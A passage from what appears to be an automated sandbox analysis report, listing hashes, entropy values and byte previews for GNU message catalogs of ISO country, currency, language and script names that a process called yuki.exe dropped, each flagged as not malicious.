                                                                                                    SSDEEP:384:4Wbyg4WjVDxa5hW8ShwMJqZ/eKUPpugtV+mUHMGRNtz851lAQqdT:4WbJDxa5I4T/4PpugtV+mUHlRNtQ5TAx
                                                                                                    MD5:517998847EFC71AF3129392030ABEB5D
                                                                                                    SHA1:43D1C73E78164AFCE91D4A901420FDC3A826E3B7
                                                                                                    SHA-256:C3E00E42C7B050ADA9AD8203A32C5E71BD21EF82BB590FF7F54B86D985991437
                                                                                                    SHA-512:097C96CF35739B6E35F01C0163250BAF06039AED78E71B7E6F3441FD17BD67ED579A7AF9BDBDFDB128CB11F8FF01855777F08F877E5AAAA5C76A472CF3A598E8
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\340\256\206\340\256\252\340\257\215\340\256\225\340\256\276\340\256\251\340\256\277\340\256\244\340\257\215\340\256\244\340\256\276\340\256\251\340\257\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35476
                                                                                                    Entropy (8bit):4.894857078112691
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0o/Pd45SAgS48fmsWP48WAIBEB+HIwVQz2CB/jHBXlJm0qe9HNpmob3+/o0ZNMpT:by5TgS48jEB+HIwVQSCB/jHBXlJm0qeP
                                                                                                    MD5:9DFC43465FF7EEB8FAEC21E9ABBADF49
                                                                                                    SHA1:FD69BF0DB276E26B25CE070DB2C683A523265E73
                                                                                                    SHA-256:2730DC2926E6726424F2A484CACFCA38CA2C954CBD0F8C25A83DEAD2C6C57C7D
                                                                                                    SHA-512:3C669FE3B5C2DB4BAF202868EA186D5A23AFAA2C69274A7115433DCB849020D858FF1B34B7C51E9A5633E43469721A29433262FAEF14F2427EB0703F9E5965FB
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.147683175233438
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxAgCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGAXmBQ8KMW0YEi9:i4n1xx8t02Ukx/iximCg5ITvXmBQWi9
                                                                                                    MD5:747B5E977C51C591B903A0DC9FE55A9F
                                                                                                    SHA1:052EFB663F3A923930503A21C5B6B46D94D10C37
                                                                                                    SHA-256:4BE3C6469C09D5283AAE9B36757B7802674D10FCFE23FB7B27B14D0598F95440
                                                                                                    SHA-512:466D50BCE296BA792740DF19CE8F661B1A22060306FFDD8470E554D6310B537FD4B0B08B498B3CDC9C39A46ED927F3BAC4695722EC40B9A49FE787C6C0A58CB3
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: ta.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\340\256\252\340\257\215\340\256\260\340\256\277\340\256\237\340\257\215\340\256\237\340\256\277\340\256\232\340\257\215 \340\256\205\340\256\243\340\257\215\340\256\237\340\256\276\340\256\260\340\257\215\340\256\237\340\256\277\340\256\225\340\257\215 \340\256\252\340\256\277\340\256\260\340\256\244\340\257\207\340\256\232\340\256\256\340\257\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4343
                                                                                                    Entropy (8bit):5.0479516475563395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:rLvcar+yaCoIWFGyABNeUfUlCtUla9xBqnsyYFeVUFTGBH47U6Vsc/mglYDhn3q4:XcareFdrAB4crXvBK4FKBHaC/OwqjUN
                                                                                                    MD5:A6F1E4CFCE3DA42CC6B54F8285FA6A6B
                                                                                                    SHA1:82A9C0C31A15D67E20B7272D081FFFA4C96F269D
                                                                                                    SHA-256:70F2A8C5898F81957D3052B1B89E8ABB6C470B39233BD6762D25CCC6AB1A34D2
                                                                                                    SHA-512:ADB60B7031FC0D24767A438C4AAFAA0DCCD7742B150EFF9C29A35E0452B161105959C6EFE5538FDDCAA979F09F5CF5EAE22595095EF194EEF7CE0584F49B7781
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................Y.......Q...(...}...z...`...........Y...........8.......(...4...8...]...T...............S...t...T.......(.......(...F...=...o...(...............n.......>...t...m...........!...+...:...E...f...........8.../...f...h...........w.......i...a...+............... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 '\340\256\225\340\256\243\340\256\225\340\257\215\340\256\225\340\256\277\340\256\251\340\257\215 \340\256\217\340\256\237\340\256\277\340\256\252\340\256\277 \340\256\205\340\256\262\340\256\225\340\257\201'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14738
                                                                                                    Entropy (8bit):4.916289040002022
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Sgn6TL0G/Uo/vPWZI2sllQVTEfOWDrV+JbrETp6y0LvmfmaAQW:Sgn8YAUoX9r2WD5+J/Ip30LvqmHQW
                                                                                                    MD5:AC08168A78C2DDAD25F9B1112E682B45
                                                                                                    SHA1:32379978E3FBF72B2CA622D9CF1BC77C25F0284D
                                                                                                    SHA-256:E80C06D5AB3B7A29052343BE109564EE94C9A563DC9528BD3A8A15A87AB79803
                                                                                                    SHA-512:FA7487C189404E08DC3B65CB0A4C60783B748D83FD354D000D40635D36C4B90EFF8B54C82F54CE4F3B4CEB3D2F3A9C0FFBF23B5D81DC5CBB8C6FB3EA0FBEF169
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7229 messages, Project-Id-Version: iso_639-3 ''\340\256\206\340\256\260\340\257\215'\340\256\206\340\256\260\340\257\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):438885
                                                                                                    Entropy (8bit):5.127062959973817
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:U+hWOGux6YfP2LlixvGsb3lg1YdTrRHH2r/9HLEqy3hq3Lw:U+hLbNfOBKIy2xrpgUs
                                                                                                    MD5:AAF447D1CD24FC1E1A2187C2E16B3473
                                                                                                    SHA1:93072E18C87FFD2E7B286255E995E57C165D4E16
                                                                                                    SHA-256:48A85CAD01BBA40FAE79905F87D5009AFBF21B8D0AA4B840894B5801EEA02F1A
                                                                                                    SHA-512:BFC16ED1E41A976E3EBD25F145B793ABDF55D65A80BEA7A80CA109EA4C7EBCA067EC2E4001827E6FC39B331F155E885FCB0AE2E12D36D0C01ED697C884ECE598
                                                                                                    Malicious:false
                                                                                                    Preview:........=............%...........Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......[.......[.......[.......[.......[......)[......9[......I[......N[......S[......Y[......][......j[......o[......t[......y[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......\.......\.......\......'\....../\......6\......<\......C\......G\......U\......]\......c\......j\......q\......v\......}\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......].......].......]......!]......9]......O]......]]......m]......z].......].......].......].......].......].......].......].......].......].......].......].......^.......^.......^.......^.......^......&^......-^......5^......<^......B^......I^......O^......V^......c^......p^......v^......~^.......^.......^.......^.......^.......^.......^......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 '\340\256\206\340\256\252\340\257\215\340\256\252\340\256\277\340\256\260\340\256\225\340\257\215\340\256\225-\340\256\206\340\256\232\340\256\277\340\256\257 \340\256\256\340\257\212\340\256\264\340\256\277\340\256\225\340\256\263\340\257\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11658
                                                                                                    Entropy (8bit):4.826720665588928
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDxVgI6x+3SE0BfNcaFpSxwrqgNhrxyjCLCryYRsjjygZ0Pt44uRnFYNg:XPrEnE0BfNcajCMnab8F6g
                                                                                                    MD5:E1CD082BCC25FB4797462DDB2EF0E7B7
                                                                                                    SHA1:10F37D54C19A5A1D13F22D46BA2F59CEDCF07833
                                                                                                    SHA-256:00D08681F6D8E05EE8BB762811B1D3A510C33F2424CFD4353AEC899B5655D2A5
                                                                                                    SHA-512:947ADB7C513CD762BB5D3DE27BE6734F30D89B46DBCD20AB708B46373948414DC01033F3E9A6187BCEC456E5135CBC414627343D9111BB5CE456A85D6265BBEB
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#.......................................>.......4...2.......g...+.......4...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 402 messages, Project-Id-Version: iso_3166-1 '\340\260\206\340\260\253\340\261\215\340\260\230\340\260\250\340\260\277\340\260\270\340\261\215\340\260\244\340\260\276\340\260\250\340\261\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35338
                                                                                                    Entropy (8bit):4.923080920521298
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:P5DKTgqsJc1KFJfRVjj5wsOP4XLAEOu3LOWVj3Nud1VuNLohYyCbdRs4Dgncc1EL:0XgzXmsOP4XLAEtoFQt5J1CMaPU4or3
                                                                                                    MD5:328F1621DF6B47E80611BD4EEF6F660D
                                                                                                    SHA1:9820A4F2D6015E0CF02DE1049B598A652ADACE70
                                                                                                    SHA-256:99C154CA7CD1F66F69380EC3421CF67A288DC0935B8D689E90FDF2EFF47B23BE
                                                                                                    SHA-512:9DB622CCA831E367EA5FA016719DAD05F743E7C5277358C0B8FA41B6E5215412B9AD4A8D69457955AA523C94936725A3F77EAC3EFD858ACB699577A9A1B61DA2
                                                                                                    Malicious:false
                                                                                                    Preview:........................<........!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......*"......4"......G"......O"......U"......_"......g"......r"......z".......".......".......".......".......".......".......".......".. ....".......".......".......#......"#......+#......9#......@#......_#......v#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$......!$......*$......C$..,..._$.......$.......$..%....$.......$.......$.......$.......$.......$.......$.......$..%....%..,...0%.."...]%..*....%.......%.......%.......%.......%.......%.......%.......%.......&.......&...... &......(&......0&......9&......U&..'...c&..$....&.......&.......&.......&.......'......%'......*'......2'......9'......G'......X'......h'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(.......(...... (.......(......5(......;(..!...W(......y(.......(.......(.......(..0...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\260\254\340\261\215\340\260\260\340\260\277\340\260\237\340\260\277\340\260\267\340\261\215 \340\260\205\340\260\202\340\260\237\340\260\276\340\260\260\340\261\215\340\260\225\340\260\277\340\260\237\340\260\277\340\260\225\340\261\215 \340\260\252\340\261\215\340\260\260\340\260\246\340\261\207\340\260\266\340\260\256\340\261\201'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4169
                                                                                                    Entropy (8bit):5.1084799966570005
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDXWfsyBoHS9+Xg7FxF58FZu2hSSFzFZTFrJ9hLuFZpbPuFpJP3rHFsZ32Y:qDXWcHoBD2RpnrHh2XbClsN
                                                                                                    MD5:2F4D0556E7A5E5DAB1205798CFC6C86C
                                                                                                    SHA1:E2D256F98240D57FF3824F110CD0D5B5C4CEADD0
                                                                                                    SHA-256:D49DE98F23E170E131D2BE5A8BFC063FE098B6631B7B2DE3DDFFFAE1504E707B
                                                                                                    SHA-512:B40D710EE40D15C7F5CCC2B192951520E5008CA9BADEEB9CF6BCC0E8C9CDF4460A0AFD8775AE27A571EFF8534D77B1E32B1BCC741545F69AD0287F14D0C79058
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................V...T...v..........."...T.......................8.......".......A.......K...4...........P.......T...Q...7...............@.......(...N...+...w..._......./.......J...3.......~...(.......c...........$...I.......}...............t.......3............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\322\223\320\276\320\275\320\270\321\201\321\202\320\276\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28527
                                                                                                    Entropy (8bit):5.30668046995776
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:jhZDjjl68ItmsWP4XdAIcq6fGHstCKIIw5iP+lce:LDV6fKn3EKHfmce
                                                                                                    MD5:B9D402087B8E910F8A07D37181F5FAFF
                                                                                                    SHA1:82A8C7E969175EE769406D08238A95AF89AF3409
                                                                                                    SHA-256:4351AC6DD123D4FCABCAC6EADB2CC12D574C7610ABF46D98589D99D0D2906FF5
                                                                                                    SHA-512:E3D95227A0C1548C6F41950430F0329B2FF04E043E0D363FFA17EDDE35E0119877B802998E5ADFC9DA4B9B97615668E3EFC9C321832054EE6448568D17D3CF6B
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 156 messages, Project-Id-Version: iso_15924 '\340\271\204\340\270\256\340\271\202\340\270\243\340\270\201\340\270\245\340\270\264\340\270\237\340\270\255\340\270\231\340\270\262\340\271\202\340\270\225\340\271\200\340\270\245\340\270\265\340\270\242 (\340\271\204\340\270\256\340\271\202\340\270\243\340\270\201\340\270\245\340\270\264\340\270\237\340\270\245\340\270\271\340\271\200\340\270\247\340\270\265\340\270\242, \340\271\204\340\270\256\340\271\202\340\270\243\340\270\201\340\270\245\340\270\264\340\270\237\340\270\256\340\270\264'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11584
                                                                                                    Entropy (8bit):5.068556255176557
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:WzSfHl+Veox944Lj4SaorSC1Phf5yH3vb6AdXsjKq8e/siQ9oUDS8QV8QUpdijbt:58944LjzaorSC1P/yH3vuA1sjhQ9oUDu
                                                                                                    MD5:1DDE1660DCC965E012B672043B3D60BB
                                                                                                    SHA1:4E0AC1B1E53216BC364F431A92BC9B2D987E570A
                                                                                                    SHA-256:2265FAFC30FAE6200403E03C74E46BEB0AEAA1BE90C4F6390126F275B1EA547B
                                                                                                    SHA-512:F49F27E953F208AB116EFABCCA5965E563FE0A95336F49D26682FE02840D28A6202FF709DD175E553B65FD97BE9381214BCA96812C562719AAB3E3DE7889ABD3
                                                                                                    Malicious:false
                                                                                                    Preview:................................(...?...).......i.......p.......y...............................................................................................................................................................7.......O.......l...................................&.......................(...........1.......B.......T.......i.......q.............................................................................................../.......6.......=.......F.......W.......h.......~...........4...................................................#...............4.......;.......M.......m.......q.......w.............................................................................................................../.......A.......`.......n...........................................................................................#...........%..."...E...)...h.......................................................................................................).......C... ...b...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 413 messages, Project-Id-Version: iso_3166-1 '\340\270\255\340\270\261\340\270\237\340\270\201\340\270\262\340\270\231\340\270\264\340\270\252\340\270\226\340\270\262\340\270\231'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33663
                                                                                                    Entropy (8bit):4.985121752626473
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:pZd6DkBkLVfovmsOP4XLAIAcBBH7EJypA3s/NmdreTUJL00g4aVGibftzay9ZBmo:1zuKtLGyT/symDO3
                                                                                                    MD5:6F00A2E09B0916A4AC70E9F0465A723D
                                                                                                    SHA1:3C6D4C30C3FFDCA5776D7C0EF38149143D4B2DE7
                                                                                                    SHA-256:E9384B31E9B904D2D8674BBA4B956A681E488656AF599A83613B7584193480D2
                                                                                                    SHA-512:B6957EB41F7C94AD4F4663AE9A5E770B4C38378A58C09A85061C5E3CD93B416E508FC792330736628DC021C1806B364F2EB0614A7515F377A6D75584F86314AF
                                                                                                    Malicious:false
                                                                                                    Preview:....................-............".......".......".......".......".......".......".......".......".......".......#.......#......$#......7#......?#......E#......O#......W#......b#......j#......r#......}#.......#.......#.......#.......#.......#.......#.. ....#.......#.......#.. ....#.......$......3$......<$......J$......Q$......p$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%.......%......%%......=%......F%......_%..,...{%.......%.......%..%....%.......%.......%.......%.......%.......&.......&.......&...... &......(&..%...7&..,...]&.."....&..*....&.......&.......&.......&.......&.......'......!'......)'....../'......;'......M'......U'......]'......f'.......'..'....'..$....'.......'.......'.......(......1(......P(......n(......s(......{(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......)......&)......-)......7)......?)......J)......O)......Y)......b)......i)......w)......~).......)..!...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1399 messages, Project-Id-Version: iso_3166-2 '\340\270\255\340\270\262\340\270\243\340\271\214\340\271\200\340\270\201\340\270\262'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):82740
                                                                                                    Entropy (8bit):5.0072497653643335
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:IyAjHidmjJr6d3TVY6uyJJtFNUh6yy13woWMlvpa0pvwOLGEHyLy4nRId:RSHj6tVY6uZy1QuAEyLy4nk
                                                                                                    MD5:199A7134162E8C04C5082F5FD5B723D4
                                                                                                    SHA1:395BA8527BAE234B622280EDEF8AF1E38E3D7970
                                                                                                    SHA-256:D7C2DF98DF76C5F17398FAEE3D708C875A9453F8241A9CD7729CA7E13B6AB971
                                                                                                    SHA-512:47F0ACFB322D44DADACD610AEA789A74E8F1896253B9C6BEFB8080115D73BF9A21A0255C486E1E323B9230549B4E9F58B6853FC04159DB3E8F4EA17658122894
                                                                                                    Malicious:false
                                                                                                    Preview:........w........+..K....W.......t.......t.......t.......t.......t.......t.......t.......t.......t.......t.......t.......u.......u.......u......+u......1u......7u......Au......Vu......bu......ju......tu.......u.......u.......u.......u.......u.......u.......u.......u.......u.......u.......u.......u.......u.......u.......v.......v.......v......'v....../v......6v......Rv......av......iv......zv.......v.......v.......v.......v.......v.......v.......v.......v.......v.......v.......v.......w.......w.......w.......w......"w......+w......2w......:w......Cw......Kw......Sw......Xw......^w......ew......sw......yw.......w.......w.......w.......w.......w.......w.......w.......w..+....w.......x.......x.......x.......x......#x.......x......5x......>x......Ex......Mx......`x......hx......qx......yx......~x.......x.......x.......x.......x.......x.......x.......x.......x.......x.......x.......x.......y.......y.......y.......y......#y....../y......Iy......Ry......oy......vy......}y.......y.......y......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\270\232\340\270\243\340\270\264\340\270\225\340\270\264\340\270\212\340\271\201\340\270\255\340\270\231\340\270\225\340\270\262\340\270\243\340\271\214\340\270\201\340\270\225\340\270\264\340\270\201\340\271\200\340\270\227\340\270\243\340\271\214\340\270\243\340\270\264\340\270\227\340\270\255\340\270\243\340\270\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3819
                                                                                                    Entropy (8bit):5.188867539575419
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDt2+3yBoaNUvTBLyyZkyvV01JgjvTOhWfT3BGG0xG:qDs+NuUvdVkyvu1JIvyhWfTBGGuG
                                                                                                    MD5:7BFF4ADDA9F05AAE2815309BA4F386B2
                                                                                                    SHA1:7A99DBC28FB7A5EB9B1FEB6F6784DFD0C2206E93
                                                                                                    SHA-256:2295542D22091F86BDAC4AC760C77A3E15EF7D1669D7F39440764D9437538910
                                                                                                    SHA-512:9A6145672C2C10D21618ED766E914EED719182653E577A88FA10C72853B0154F2E825EA8A6B2D7FECF07D16ED5FC3EBF54FFAEDEC1B914251811BC6B442BBAB9
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........o.......Q......._...k...n.......Z...:..._...............-.......*...<...H...g...H.......{.......S...u...N.......'.......-...@...?...n...!.......!.......`.......'...S...B...{...........!.......K.......f...?...D.......V...........B...b...X.../............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 142 messages, Project-Id-Version: iso_4217 '\340\270\255\340\270\261\340\270\237\340\270\201\340\270\262\340\270\231\340\270\264'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10193
                                                                                                    Entropy (8bit):4.907466602737853
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:HniqyehPn35MTPCVOkKjJJaPnwFbJFf5f+QTcf7zyWaib+vUEA+YGtvV7g7dsRMn:Hn4W35MTPGlKVEKzxfT67zyWaibCE8tm
                                                                                                    MD5:96FAF1103B5D88EE13E671C21DC7FDA5
                                                                                                    SHA1:A7FDA9269463F783F2491B342468167CB9FA0767
                                                                                                    SHA-256:83AB80D75935B2141D8EC917FCFF93A3F9BAFE68DAE0AA5E4B7DFF226A54EA1F
                                                                                                    SHA-512:295A7CAD204B798CED827A5C7BCDD7459178ACD094B75131ABEF09B45277A668CEC7949EC546E4A8E0F222166FA663F8DEBA9A44FB2365328E62A3EC9C1F097F
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................-.......?.......O.......^.......c.......j.......z...............................................................................................+.......8.......G.......W.......c.......u.......................................................................................................................2.......>.......E.......P.......`.......e.......l.......t.......................................................................................................................#.......2.......6.......>.......D.......T.......a.......k.......p...............................................................................................................7.......H.......X.......`.......o.......y...............................................................................................................................!.......-.......;.......L.......S.......d.......{.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 711 messages, Project-Id-Version: iso_639-3 '\340\271\201\340\270\255\340\270\232\340\270\201\340\270\262\340\271\200\340\270\213\340\270\265\340\270\242'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53438
                                                                                                    Entropy (8bit):5.075896409348321
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:WDbQw4l8lWctkTiEvsFXtxprL+kWdjs0gyNpk6QrHx7:OW+lWReEmkk5p6Q7B
                                                                                                    MD5:D479C37DF2A7E33C3BF196F1D7ADFE4A
                                                                                                    SHA1:DF5FFEB173689EE75D1C733160EB63F25F22B6AE
                                                                                                    SHA-256:6510831288947A04DC10B76B28968688BC098F668C861110885A8EB3A5F8286C
                                                                                                    SHA-512:6ED578A57256772FBEDB37DED145CB47FD25889325D82D3D73C4AF1B9B6D9F8A022EE6776C243C91C89A587D75DA1521B080F697B6013F5AE87CB81C6B13E16C
                                                                                                    Malicious:false
                                                                                                    Preview:................T........,......p;......q;......{;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......<.......<......&<......=<......E<......]<......l<.......<.."....<.......<.......<.......<.......<.......<.......=.......=......+=......@=......O=......d=......u=.......=.......=.......=.......=.......=.......=.......=.......>......$>......<>......E>......\>......p>.......>.......>..#....>.......>.......>.......>.......>.......>.......?.......?.......?......2?......I?......R?......a?......i?......p?......{?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......@.......@......"@......)@......2@......8@......B@......Z@......b@......o@.......@.......@.......@.......@.......@.......@.......@.......@.......@.......A.......A......(A......7A......MA......TA......bA......pA......xA.......A.......A.......A.......A.......A.......A.......A.......B.......B......&B......8B......IB......ZB......mB......zB.......B.......B.......B.......B......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 209 messages, Project-Id-Version: iso_3166-1 '\341\212\243\341\215\215\341\214\213\341\212\222\341\210\265\341\211\263\341\212\225'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11811
                                                                                                    Entropy (8bit):5.171500265044734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:BvF8RsnMQWZUaqW4Ro1V299UF6J6/74OeYh1+HuYbOrrMbvyfasl:BvF8RPpFs9UF6s/74rYf+HuYbOrr4yfp
                                                                                                    MD5:9D86D76CC9C9CB5397616ACAD9D3AEC1
                                                                                                    SHA1:8161F5DFF92CC502ED512887BFBBFCFC5D9BCEA6
                                                                                                    SHA-256:8CBCAA925C046923C1A07127DEA33832E430A63B777B6946B841364513898067
                                                                                                    SHA-512:E2C2D9B26D27AB5B98A91DC8F3A349AED24F68628F48DD396B78BF58F54E553C31F103561C85BA8C090685A22320514DC72854DB1956D7B7647B0612D5BC0000
                                                                                                    Malicious:false
                                                                                                    Preview:........................,....................................................................................................................................... .......(.......3.......<.......D.......L.......S.......Y.......a... ...h...............................................................................................................$.......*.......0.......9.......A...%...G.......m.......x....................................................................................................................... ...'...).......Q.......m.......................................................................................................................%.......,.......2.......;.......E.......M.......U.......[.......e.......j.......r......................................................................................................./.......6.......=.......E.......K.......U.......`.......g.......p.......u.......{.......................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\341\212\224\341\213\230\341\210\255\341\210\213\341\212\225\341\213\265\341\210\265 \341\212\240\341\212\225\341\211\262\341\210\215\341\210\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):477
